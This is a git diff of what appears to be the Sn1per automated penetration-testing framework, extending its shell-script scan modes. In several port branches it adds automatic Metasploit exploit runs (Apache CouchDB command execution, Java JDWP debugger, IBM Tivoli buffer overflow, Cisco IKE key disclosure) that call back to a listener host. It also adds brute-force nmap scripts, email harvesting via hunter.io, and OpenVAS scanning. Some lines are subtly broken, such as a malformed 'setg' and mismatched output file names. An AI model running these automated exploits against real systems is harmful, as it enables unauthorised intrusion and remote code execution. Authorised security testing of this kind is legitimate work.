-port_8009=`grep 'portid="8009"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` port_8080=`grep 'portid="8080"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` port_8180=`grep 'portid="8180"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` port_8443=`grep 'portid="8443"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` port_8888=`grep 'portid="8888"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` -port_8888=`grep 'portid="9200"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` +port_9200=`grep 'portid="9200"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` +port_9495=`grep 'portid="9495"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` port_10000=`grep 'portid="10000"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` port_16992=`grep 'portid="16992"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` port_27017=`grep 'portid="27017"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` port_27018=`grep 'portid="27018"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` port_27019=`grep 'portid="27019"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` port_28017=`grep 'portid="28017"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` +port_49180=`grep 'portid="49180"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` port_49152=`grep 'portid="49152"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` -if [ "$FULLNMAPSCAN" = "1" ]; then - port_67=`grep 'portid="67"' $LOOT_DIR/nmap/nmap-udp-$TARGET.xml | grep open` - port_68=`grep 'portid="68"' $LOOT_DIR/nmap/nmap-udp-$TARGET.xml | grep open` - port_69=`grep 'portid="69"' $LOOT_DIR/nmap/nmap-udp-$TARGET.xml | grep open` - port_123=`grep 'portid="123"' $LOOT_DIR/nmap/nmap-udp-$TARGET.xml | grep open` - port_161=`grep 'portid="161"' $LOOT_DIR/nmap/nmap-udp-$TARGET.xml | grep open` -fi +port_67=`grep 'portid="67"' $LOOT_DIR/nmap/nmap-udp-$TARGET.xml | grep open | grep -v filtered` +port_68=`grep 'portid="68"' $LOOT_DIR/nmap/nmap-udp-$TARGET.xml | grep open | grep -v filtered` +port_69=`grep 'portid="69"' $LOOT_DIR/nmap/nmap-udp-$TARGET.xml | grep open | grep -v filtered` +port_123=`grep 'portid="123"' $LOOT_DIR/nmap/nmap-udp-$TARGET.xml | grep open | grep -v filtered` +port_161=`grep 'portid="161"' $LOOT_DIR/nmap/nmap-udp-$TARGET.xml | grep open | grep -v filtered` +port_500=`grep 'portid="500"' $LOOT_DIR/nmap/nmap-udp-$TARGET.xml | grep open | grep -v filtered` if [ -z "$port_21" ]; then @@ -370,7 +370,7 @@ else echo -e "${OKGREEN}====================================================================================${RESET}" echo -e "$OKRED RUNNING NMAP HTTP SCRIPTS $RESET" echo -e "${OKGREEN}====================================================================================${RESET}" - nmap -A -Pn -T5 -p 80 -sV --script=*http-vuln*,/usr/share/nmap/scripts/vulscan/vulscan.nse,/usr/share/nmap/scripts/vulners $TARGET | tee $LOOT_DIR/output/nmap-$TARGET-port80 + nmap -A -Pn -T5 -p 80 -sV --script=http-adobe-coldfusion-apsa1301,http-apache-negotiation,http-apache-server-status,http-aspnet-debug,http-auth-finder,http-auth,http-avaya-ipoffice-users,http-awstatstotals-exec,http-axis2-dir-traversal,http-backup-finder,http-barracuda-dir-traversal,http-bigip-cookie,http-brute,http-cakephp-version,http-chrono,http-cisco-anyconnect,http-coldfusion-subzero,http-comments-displayer,http-config-backup,http-cookie-flags,http-cors,http-cross-domain-policy,http-date,http-default-accounts,http-devframework,http-dlink-backdoor,http-dombased-xss,http-domino-enum-passwords,http-drupal-enum-users,http-drupal-enum,http-enum,http-errors,http-feed,http-form-brute,http-frontpage-login,http-generator,http-git,http-gitweb-projects-enum,http-headers,http-hp-ilo-info,http-huawei-hg5xx-vuln,http-icloud-findmyiphone,http-icloud-sendmsg,http-iis-short-name-brute,http-iis-webdav-vuln,http-internal-ip-disclosure,http-joomla-brute,http-jsonp-detection,http-litespeed-sourcecode-download,http-ls,http-majordomo2-dir-traversal,http-malware-host,http-mcmp,http-method-tamper,http-methods,http-mobileversion-checker,http-ntlm-info,http-open-proxy,http-open-redirect,http-passwd,http-php-version,http-phpmyadmin-dir-traversal,http-phpself-xss,http-proxy-brute,http-put,http-qnap-nas-info,http-referer-checker,http-robots.txt,http-robtex-reverse-ip,http-robtex-shared-ns,http-sap-netweaver-leak,http-security-headers,http-server-header,http-shellshock,http-sitemap-generator,http-svn-enum,http-svn-info,http-title,http-tplink-dir-traversal,http-trace,http-trane-info,http-unsafe-output-escaping,http-userdir-enum,http-vhosts,http-virustotal,http-vlcstreamer-ls,http-vmware-path-vuln,http-vuln-cve2006-3392,http-vuln-cve2009-3960,http-vuln-cve2010-0738,http-vuln-cve2010-2861,http-vuln-cve2011-3192,http-vuln-cve2011-3368,http-vuln-cve2012-1823,http-vuln-cve2013-0156,http-vuln-cve2013-6786,http-vuln-cve2013-7091,http-vuln-cve2014-2126,http-vuln-cve2014-2127,http-vuln-cve2014-2128,http-vuln-cve2014-2129,http-vuln-cve2014-3704,http-vuln-cve2014-8877,http-vuln-cve2015-1427,http-vuln-cve2015-1635,http-vuln-cve2017-1001000,http-vuln-cve2017-5638,http-vuln-cve2017-5689,http-vuln-cve2017-8917,http-vuln-misfortune-cookie,http-vuln-wnr1000-creds,http-waf-detect,http-waf-fingerprint,http-webdav-scan,http-wordpress-brute,http-wordpress-enum,http-wordpress-users,https-redirect,/usr/share/nmap/scripts/vulscan/vulscan.nse,/usr/share/nmap/scripts/vulners $TARGET | tee $LOOT_DIR/output/nmap-$TARGET-port80 sed -r "s/ /dev/null > $LOOT_DIR/output/nmap-$TARGET-port80.txt 2> /dev/null rm -f $LOOT_DIR/output/nmap-$TARGET-port80 2> /dev/null fi @@ -638,7 +638,7 @@ else echo -e "${OKGREEN}====================================================================================${RESET}" echo -e "$OKRED RUNNING NMAP HTTP SCRIPTS $RESET" echo -e "${OKGREEN}====================================================================================${RESET}" - nmap -A -sV -T5 -Pn -p 443 --script=*http-vuln*,/usr/share/nmap/scripts/vulscan/vulscan.nse,/usr/share/nmap/scripts/vulners $TARGET | tee $LOOT_DIR/output/nmap-$TARGET-port443 + nmap -A -sV -T5 -Pn -p 443 --script=http-adobe-coldfusion-apsa1301,http-apache-negotiation,http-apache-server-status,http-aspnet-debug,http-auth-finder,http-auth,http-avaya-ipoffice-users,http-awstatstotals-exec,http-axis2-dir-traversal,http-backup-finder,http-barracuda-dir-traversal,http-bigip-cookie,http-brute,http-cakephp-version,http-chrono,http-cisco-anyconnect,http-coldfusion-subzero,http-comments-displayer,http-config-backup,http-cookie-flags,http-cors,http-cross-domain-policy,http-date,http-default-accounts,http-devframework,http-dlink-backdoor,http-dombased-xss,http-domino-enum-passwords,http-drupal-enum-users,http-drupal-enum,http-enum,http-errors,http-feed,http-form-brute,http-frontpage-login,http-generator,http-git,http-gitweb-projects-enum,http-headers,http-hp-ilo-info,http-huawei-hg5xx-vuln,http-icloud-findmyiphone,http-icloud-sendmsg,http-iis-short-name-brute,http-iis-webdav-vuln,http-internal-ip-disclosure,http-joomla-brute,http-jsonp-detection,http-litespeed-sourcecode-download,http-ls,http-majordomo2-dir-traversal,http-malware-host,http-mcmp,http-method-tamper,http-methods,http-mobileversion-checker,http-ntlm-info,http-open-proxy,http-open-redirect,http-passwd,http-php-version,http-phpmyadmin-dir-traversal,http-phpself-xss,http-proxy-brute,http-put,http-qnap-nas-info,http-referer-checker,http-robots.txt,http-robtex-reverse-ip,http-robtex-shared-ns,http-sap-netweaver-leak,http-security-headers,http-server-header,http-shellshock,http-sitemap-generator,http-svn-enum,http-svn-info,http-title,http-tplink-dir-traversal,http-trace,http-trane-info,http-unsafe-output-escaping,http-userdir-enum,http-vhosts,http-virustotal,http-vlcstreamer-ls,http-vmware-path-vuln,http-vuln-cve2006-3392,http-vuln-cve2009-3960,http-vuln-cve2010-0738,http-vuln-cve2010-2861,http-vuln-cve2011-3192,http-vuln-cve2011-3368,http-vuln-cve2012-1823,http-vuln-cve2013-0156,http-vuln-cve2013-6786,http-vuln-cve2013-7091,http-vuln-cve2014-2126,http-vuln-cve2014-2127,http-vuln-cve2014-2128,http-vuln-cve2014-2129,http-vuln-cve2014-3704,http-vuln-cve2014-8877,http-vuln-cve2015-1427,http-vuln-cve2015-1635,http-vuln-cve2017-1001000,http-vuln-cve2017-5638,http-vuln-cve2017-5689,http-vuln-cve2017-8917,http-vuln-misfortune-cookie,http-vuln-wnr1000-creds,http-waf-detect,http-waf-fingerprint,http-webdav-scan,http-wordpress-brute,http-wordpress-enum,http-wordpress-users,https-redirect,/usr/share/nmap/scripts/vulscan/vulscan.nse,/usr/share/nmap/scripts/vulners $TARGET | tee $LOOT_DIR/output/nmap-$TARGET-port443 sed -r "s/ /dev/null > $LOOT_DIR/output/nmap-$TARGET-port443.txt 2> /dev/null rm -f $LOOT_DIR/output/nmap-$TARGET-port443 2> /dev/null fi @@ -710,7 +710,6 @@ else fi echo -e "$OKRED[+]$RESET Screenshot saved to $LOOT_DIR/screenshots/$TARGET-port443.jpg" - if [ $WEBSCREENSHOT = "1" ]; then cd $LOOT_DIR python $INSTALL_DIR/bin/webscreenshot.py -t 5 https://$TARGET:443 @@ -757,6 +756,21 @@ else fi fi +if [ -z "$port_500" ]; +then + echo -e "$OKRED + -- --=[Port 500 closed... skipping.$RESET" +else + echo -e "$OKORANGE + -- --=[Port 500 opened... running tests...$RESET" + if [ "$METASPLOIT_EXPLOIT" = "1" ]; then + echo -e "${OKGREEN}====================================================================================${RESET}" + echo -e "$OKRED RUNNING CISCO IKE KEY DISCLOSURE EXPLOIT $RESET" + echo -e "${OKGREEN}====================================================================================${RESET}" + msfconsole -q -x "use auxiliary/scanner/ike/cisco_ike_benigncertain; set RHOSTS "$TARGET"; set PACKETFILE /usr/share/metasploit-framework/data/exploits/cve-2016-6415/sendpacket.raw; set THREADS 24; set RPORT 500; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port500-cisco_ike_benigncertain.raw + sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port500-cisco_ike_benigncertain.raw > $LOOT_DIR/output/msf-$TARGET-port500-cisco_ike_benigncertain.txt 2> /dev/null + rm -f $LOOT_DIR/output/msf-$TARGET-port500-cisco_ike_benigncertain.raw 2> /dev/null + fi +fi + if [ -z "$port_512" ]; then echo -e "$OKRED + -- --=[Port 512 closed... skipping.$RESET" @@ -1051,6 +1065,12 @@ else msfconsole -q -x "use auxiliary/scanner/couchdb/couchdb_enum; set RHOST "$TARGET"; run; exit;"| tee $LOOT_DIR/output/msf-$TARGET-port5984-couchdb_enum.raw sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port5984-couchdb_enum.raw > $LOOT_DIR/output/msf-$TARGET-port5984-couchdb_enum.txt 2> /dev/null rm -f $LOOT_DIR/output/msf-$TARGET-port5984-couchdb_enum.raw 2> /dev/null + echo -e "${OKGREEN}====================================================================================${RESET}" + echo -e "$OKRED RUNNING APACHE COUCHDB RCE EXPLOIT $RESET" + echo -e "${OKGREEN}====================================================================================${RESET}" + msfconsole -q -x "use exploit/linux/http/apache_couchdb_cmd_exec; set RHOSTS "$TARGET"; set RPORT 5984; setg LHOST $MSF_LHOST; setg $MSF_LPORT; run; exit;"| tee $LOOT_DIR/output/msf-$TARGET-port5984-couchdb_enum.raw + sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port5984-apache_couchdb_cmd_exec.raw > $LOOT_DIR/output/msf-$TARGET-port5984-apache_couchdb_cmd_exec.txt 2> /dev/null + rm -f $LOOT_DIR/output/msf-$TARGET-port5984-apache_couchdb_cmd_exec.raw 2> /dev/null fi fi @@ -1120,6 +1140,46 @@ else fi fi + + + + + + + + + + +if [ -z "$port_8000" ]; +then + echo -e "$OKRED + -- --=[Port 8000 closed... skipping.$RESET" +else + echo -e "$OKORANGE + -- --=[Port 8000 opened... running tests...$RESET" + if [ "$METASPLOIT_EXPLOIT" = "1" ]; then + echo -e "${OKGREEN}====================================================================================${RESET}" + echo -e "$OKRED RUNNING JAVA JDWP DEBUG EXPLOIT $RESET" + echo -e "${OKGREEN}====================================================================================${RESET}" + msfconsole -q -x "use exploit/multi/misc/java_jdwp_debugger; setg RHOSTS "$TARGET"; set RPORT 8000; set SSL false; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port_8000-java_jdwp_debugger.raw + sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port_8000-java_jdwp_debugger.raw > $LOOT_DIR/output/msf-$TARGET-port_8000-java_jdwp_debugger.txt 2> /dev/null + rm -f $LOOT_DIR/output/msf-$TARGET-port_8000-java_jdwp_debugger.raw 2> /dev/null + fi +fi + +if [ -z "$port_9495" ]; +then + echo -e "$OKRED + -- --=[Port 9495 closed... skipping.$RESET" +else + echo -e "$OKORANGE + -- --=[Port 9495 opened... running tests...$RESET" + if [ "$METASPLOIT_EXPLOIT" = "1" ]; then + echo -e "${OKGREEN}====================================================================================${RESET}" + echo -e "$OKRED RUNNING IBM TIVOLI ENDPOINT OVERFLOW EXPLOIT $RESET" + echo -e "${OKGREEN}====================================================================================${RESET}" + msfconsole -q -x "use exploit/windows/http/ibm_tivoli_endpoint_bof; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; set SSL false; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port_9495-ibm_tivoli_endpoint_bof.raw + sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port_9495-ibm_tivoli_endpoint_bof.raw > $LOOT_DIR/output/msf-$TARGET-port7001-ibm_tivoli_endpoint_bof.txt 2> /dev/null + rm -f $LOOT_DIR/output/msf-$TARGET-port_9495-ibm_tivoli_endpoint_bof.raw 2> /dev/null + fi +fi + if [ -z "$port_10000" ]; then echo -e "$OKRED + -- --=[Port 10000 closed... skipping.$RESET" @@ -1202,6 +1262,21 @@ else fi fi +if [ -z "$port_49180" ]; +then + echo -e "$OKRED + -- --=[Port 49180 closed... skipping.$RESET" +else + echo -e "$OKORANGE + -- --=[Port 49180 opened... running tests...$RESET" + if [ "$METASPLOIT_EXPLOIT" = "1" ]; then + echo -e "${OKGREEN}====================================================================================${RESET}" + echo -e "$OKRED RUNNING JAVA RMI SCANNER $RESET" + echo -e "${OKGREEN}====================================================================================${RESET}" + msfconsole -q -x "use auxiliary/scanner/misc/java_rmi_server; setg RHOSTS \"$TARGET\"; set RPORT 49180; run; back; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port49180-java_rmi_server.raw + sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port49180-java_rmi_server.raw > $LOOT_DIR/output/msf-$TARGET-port49180-java_rmi_server.txt 2> /dev/null + rm -f $LOOT_DIR/output/msf-$TARGET-port49180-java_rmi_server.raw 2> /dev/null + fi +fi + if [ $YASUO = "1" ]; then echo -e "${OKGREEN}====================================================================================${RESET}" echo -e "$OKRED SCANNING FOR COMMON VULNERABILITIES $RESET" diff --git a/modes/osint.sh b/modes/osint.sh index 139fff1e..cf4043fa 100644 --- a/modes/osint.sh +++ b/modes/osint.sh @@ -34,13 +34,20 @@ if [ "$OSINT" = "1" ]; then if [ "$VERBOSE" == "1" ]; then echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN metagoofil -d $TARGET -t doc,pdf,xls,csv,txt -l 25 -n 25 -o $LOOT_DIR/osint/ -f $LOOT_DIR/osint/$TARGET.html 2> /dev/null | tee $LOOT_DIR/osint/metagoofil-$TARGET.txt 2> /dev/null $RESET" fi + echo -e "${OKGREEN}====================================================================================${RESET}" + echo -e "$OKRED COLLECTING OSINT FROM ONLINE DOCUMENTS $RESET" + echo -e "${OKGREEN}====================================================================================${RESET}" metagoofil -d $TARGET -t doc,pdf,xls,csv,txt -l 100 -n 100 -o $LOOT_DIR/osint/ -f $LOOT_DIR/osint/$TARGET.html 2> /dev/null | tee $LOOT_DIR/osint/metagoofil-$TARGET.txt 2> /dev/null if [ "$SLACK_NOTIFICATIONS_METAGOOFIL" == "1" ]; then /bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/osint/metagoofil-$TARGET.txt" fi - - + fi + if [ "$HUNTERIO" == "1" ]; then + echo -e "${OKGREEN}====================================================================================${RESET}" + echo -e "$OKRED GATHERING EMAILS VIA HUNTER.IO $RESET" + echo -e "${OKGREEN}====================================================================================${RESET}" + curl -s "https://api.hunter.io/v2/domain-search?domain=$TARGET&api_key=$HUNTERIO_KEY" | egrep "name|value|domain|company|uri|position|phone" 2> /dev/null | tee $LOOT_DIR/osint/hunterio-$TARGET.txt 2> /dev/null fi if [ "$SLACK_NOTIFICATIONS" == "1" ]; then /bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Finished Sn1per OSINT scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" diff --git a/modes/recon.sh b/modes/recon.sh index 6b177677..ad941037 100644 --- a/modes/recon.sh +++ b/modes/recon.sh @@ -87,8 +87,8 @@ if [ "$RECON" = "1" ]; then grep -h "CNAME" $LOOT_DIR/nmap/takeovers-* 2>/dev/null | sort -u 2> /dev/null > $LOOT_DIR/nmap/takeovers_old-all.txt dig $TARGET CNAME | egrep -i "wordpress|instapage|heroku|github|bitbucket|squarespace|fastly|feed|fresh|ghost|helpscout|helpjuice|instapage|pingdom|surveygizmo|teamwork|tictail|shopify|desk|teamwork|unbounce|helpjuice|helpscout|pingdom|tictail|campaign|monitor|cargocollective|statuspage|tumblr|amazon|hubspot|cloudfront|modulus|unbounce|uservoice|wpengine|cloudapp" | tee $LOOT_DIR/nmap/takeovers-$TARGET.txt 2>/dev/null for a in `cat $LOOT_DIR/domains/domains-$TARGET-full.txt`; do dig $a CNAME | egrep -i "wordpress|instapage|heroku|github|bitbucket|squarespace|fastly|feed|fresh|ghost|helpscout|helpjuice|instapage|pingdom|surveygizmo|teamwork|tictail|shopify|desk|teamwork|unbounce|helpjuice|helpscout|pingdom|tictail|campaign|monitor|cargocollective|statuspage|tumblr|amazon|hubspot|cloudfront|modulus|unbounce|uservoice|wpengine|cloudapp" | tee $LOOT_DIR/nmap/takeovers-$a.txt 2>/dev/null; done; - grep -h "CNAME" $LOOT_DIR/nmap/takeovers-* 2>/dev/null | sort -u 2> /dev/null | awk '{print $1 " " $4 " " $5}' | grep CNAME > $LOOT_DIR/nmap/takeovers_new-all.txt - diff $LOOT_DIR/nmap/takeovers_old-all.txt $LOOT_DIR/nmap/takeovers_new-all.txt 2> /dev/null | grep "> " | awk '{print $2 " " $3 " " $4}' > $LOOT_DIR/nmap/takeovers_new-diff.txt 2> /dev/null + grep -h "CNAME" $LOOT_DIR/nmap/takeovers-* 2>/dev/null | sort -u 2> /dev/null | awk '{print $1 " " $4 " " $5}' | grep CNAME | sort -u > $LOOT_DIR/nmap/takeovers_new-all.txt + diff $LOOT_DIR/nmap/takeovers_old-all.txt $LOOT_DIR/nmap/takeovers_new-all.txt 2> /dev/null | grep "> " | awk '{print $2 " " $3 " " $4}' | sort -u > $LOOT_DIR/nmap/takeovers_new-diff.txt 2> /dev/null if [ "$SLACK_NOTIFICATIONS_TAKEOVERS_NEW" == "1" ]; then /bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/nmap/takeovers_new-diff.txt" fi @@ -102,7 +102,7 @@ if [ "$RECON" = "1" ]; then subover -l $LOOT_DIR/domains/domains-$TARGET-full.txt | tee $LOOT_DIR/nmap/subover-$TARGET 2>/dev/null sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/nmap/subover-$TARGET > $LOOT_DIR/nmap/subover-$TARGET.txt 2> /dev/null rm -f $LOOT_DIR/nmap/subover-$TARGET 2> /dev/null - diff $LOOT_DIR/nmap/subover_old-$TARGET.txt $LOOT_DIR/nmap/subover-$TARGET.txt | grep "> " 2> /dev/null | awk '{$1=""; print $0}' 2> /dev/null > $LOOT_DIR/nmap/subover_new-$TARGET.txt + diff $LOOT_DIR/nmap/subover_old-$TARGET.txt $LOOT_DIR/nmap/subover-$TARGET.txt 2> /dev/null | grep "> " 2> /dev/null | awk '{$1=""; print $0}' 2> /dev/null > $LOOT_DIR/nmap/subover_new-$TARGET.txt if [ "$SLACK_NOTIFICATIONS_SUBOVER_NEW" == "1" ]; then /bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/nmap/subover_new-$TARGET.txt" fi @@ -114,7 +114,7 @@ if [ "$RECON" = "1" ]; then echo -e "${OKGREEN}====================================================================================${RESET}" cp $LOOT_DIR/nmap/subjack-$TARGET.txt $LOOT_DIR/nmap/subjack_old-$TARGET.txt 2> /dev/null ~/go/bin/subjack -w $LOOT_DIR/domains/domains-$TARGET-full.txt -t $THREADS -timeout 30 -o $LOOT_DIR/nmap/subjack-$TARGET.txt -a -v - diff $LOOT_DIR/nmap/subjack_old-$TARGET.txt $LOOT_DIR/nmap/subjack-$TARGET.txt | grep "> " 2> /dev/null | awk '{$1=""; print $0}' 2> /dev/null > $LOOT_DIR/nmap/subjack_new-$TARGET.txt + diff $LOOT_DIR/nmap/subjack_old-$TARGET.txt $LOOT_DIR/nmap/subjack-$TARGET.txt 2> /dev/null | grep "> " 2> /dev/null | awk '{$1=""; print $0}' 2> /dev/null > $LOOT_DIR/nmap/subjack_new-$TARGET.txt if [ "$SLACK_NOTIFICATIONS_SUBJACK_NEW" == "1" ]; then /bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/nmap/subjack_new-$TARGET.txt" fi diff --git a/modes/stealth.sh b/modes/stealth.sh index 28e5e01e..ff8d676a 100644 --- a/modes/stealth.sh +++ b/modes/stealth.sh @@ -76,9 +76,19 @@ if [ "$MODE" = "stealth" ]; then echo -e "$RESET" echo -e "$OKORANGE + -- --=[Launching stealth scan: $TARGET $RESET" echo -e "$OKGREEN $RESET" - echo "$TARGET" >> $LOOT_DIR/domains/targets.txt - + echo -e "${OKGREEN}====================================================================================${RESET}" + echo -e "$OKRED GATHERING WHOIS INFO $RESET" + echo -e "${OKGREEN}====================================================================================${RESET}" + if [ "$WHOIS" == "1" ]; then + if [ "$VERBOSE" == "1" ]; then + echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN whois $TARGET 2> /dev/null | tee $LOOT_DIR/osint/whois-$TARGET.txt 2> /dev/null $RESET" + fi + whois $TARGET 2> /dev/null | tee $LOOT_DIR/osint/whois-$TARGET.txt 2> /dev/null + if [ "$SLACK_NOTIFICATIONS_WHOIS" == "1" ]; then + /bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/osint/whois-$TARGET.txt" + fi + fi echo -e "${OKGREEN}====================================================================================${RESET}" echo -e "$OKRED GATHERING DNS INFO $RESET" echo -e "${OKGREEN}====================================================================================${RESET}" diff --git a/modes/vulnscan.sh b/modes/vulnscan.sh new file mode 100644 index 00000000..bab11f3f --- /dev/null +++ b/modes/vulnscan.sh @@ -0,0 +1,74 @@ +# FULLPORTONLY MODE +if [ "$MODE" = "vulnscan" ]; then + + if [ "$REPORT" = "1" ]; then + args="-t $TARGET" + + if [ ! -z "$WORKSPACE" ]; then + args="$args -w $WORKSPACE" + LOOT_DIR=$INSTALL_DIR/loot/workspace/$WORKSPACE + echo -e "$OKBLUE[*] Saving loot to $LOOT_DIR [$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET" + mkdir -p $LOOT_DIR 2> /dev/null + mkdir $LOOT_DIR/domains 2> /dev/null + mkdir $LOOT_DIR/screenshots 2> /dev/null + mkdir $LOOT_DIR/nmap 2> /dev/null + mkdir $LOOT_DIR/notes 2> /dev/null + mkdir $LOOT_DIR/reports 2> /dev/null + mkdir $LOOT_DIR/scans 2> /dev/null + mkdir $LOOT_DIR/output 2> /dev/null + fi + + args="$args --noreport -m vulnscan" + echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null + echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/$TARGET-vulnscan.txt + sniper $args | tee $LOOT_DIR/output/sniper-$TARGET-$MODE-`date +"%Y%m%d%H%M"`.txt 2>&1 + exit + fi + + logo + + if [ "$SLACK_NOTIFICATIONS" == "1" ]; then + /bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Started Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" + fi + + echo "$TARGET" >> $LOOT_DIR/domains/targets.txt + + if [ "$OPENVAS" = "1" ]; then + echo -e "${OKGREEN}====================================================================================${RESET}" + echo -e "$OKRED RUNNING OPENVAS VULNERABILITY SCAN $RESET" + echo -e "${OKGREEN}====================================================================================${RESET}" + ASSET_ID=$(omp -u $OPENVAS_USERNAME -w $OPENVAS_PASSWORD --xml="$TARGET$TARGET" | xmlstarlet sel -t -v /create_target_response/@id) && echo "ASSET_ID: $ASSET_ID" + TASK_ID=$(omp -u $OPENVAS_USERNAME -w $OPENVAS_PASSWORD --xml "$TARGETsource_ifaceeth0" | xmlstarlet sel -t -v /create_task_response/@id) && echo "TASK_ID: $TASK_ID" + REPORT_ID=$(omp -u $OPENVAS_USERNAME -w $OPENVAS_PASSWORD --xml "" | cut -d\> -f3 | cut -d\< -f1) && echo "REPORT_ID: $REPORT_ID" + resp="" + while [[ $resp != "Done" && $REPORT_ID != "" ]] + do + omp -u $OPENVAS_USERNAME -w $OPENVAS_PASSWORD -G | grep $TARGET + resp=$(omp -u $OPENVAS_USERNAME -w $OPENVAS_PASSWORD -G | grep $TARGET | awk '{print $2}') + sleep 60 + done + if [ $REPORT_ID != "" ]; then + omp -u $OPENVAS_USERNAME -w $OPENVAS_PASSWORD --xml "" | cut -d\> -f3 | cut -d\< -f1 | base64 -d > "$LOOT_DIR/output/openvas-$TARGET.html" + + echo "Report saved to $LOOT_DIR/output/openvas-$TARGET.html" + else + echo "No report ID found. Listing scan tasks:" + omp -u $OPENVAS_USERNAME -w $OPENVAS_PASSWORD -G | grep $TARGET + fi + fi + echo -e "${OKGREEN}====================================================================================${RESET}" + echo -e "$OKRED DONE $RESET" + echo -e "${OKGREEN}====================================================================================${RESET}" + echo "$TARGET" >> $LOOT_DIR/scans/updated.txt + if [ "$SLACK_NOTIFICATIONS_NMAP" == "1" ]; then + /bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/nmap/nmap-$TARGET.txt" + /bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/nmap/nmap-$TARGET-udp.txt" + fi + if [ "$SLACK_NOTIFICATIONS" == "1" ]; then + /bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" + fi + loot + exit +fi + + diff --git a/modes/web_autopwn.sh b/modes/web_autopwn.sh index b258b4a6..2ec37b28 100644 --- a/modes/web_autopwn.sh +++ b/modes/web_autopwn.sh @@ -2,21 +2,27 @@ /bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Started Sn1per webpwn scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" fi echo -e "${OKGREEN}====================================================================================${RESET}" + echo -e "$OKRED RUNNING JBOSS VULN SCANNER $RESET" + echo -e "${OKGREEN}====================================================================================${RESET}" + msfconsole -q -x "use scanner/http/jboss_vulnscan; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-jboss_vulnscan.raw + sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-jboss_vulnscan.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-jboss_vulnscan.txt 2> /dev/null + rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-jboss_vulnscan.raw 2> /dev/null + echo -e "${OKGREEN}====================================================================================${RESET}" echo -e "$OKRED RUNNING HTTP PUT UPLOAD SCANNER $RESET" echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use scanner/http/http_put; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg SSL false; run; set PATH /uploads/; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-http_put.raw + msfconsole -q -x "use scanner/http/http_put; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; run; set PATH /uploads/; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-http_put.raw sed -r 